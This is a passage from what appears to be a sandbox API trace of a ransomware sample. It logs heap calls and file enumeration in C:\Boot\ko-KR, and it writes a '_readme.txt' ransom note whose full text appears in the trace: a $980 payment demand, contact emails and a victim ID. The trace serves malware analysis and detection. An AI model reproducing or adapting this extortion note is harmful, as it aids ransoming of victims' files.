hHeap=0x620000) returned 1 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.609] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0228.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.609] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.609] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.609] PathFindFileNameW (pszPath="") returned="" [0228.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.609] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.609] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.609] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.609] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.609] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0228.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.610] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0228.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.622] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.622] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.622] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.623] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.623] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.623] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.623] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.623] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.623] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.627] HeapFree (in: 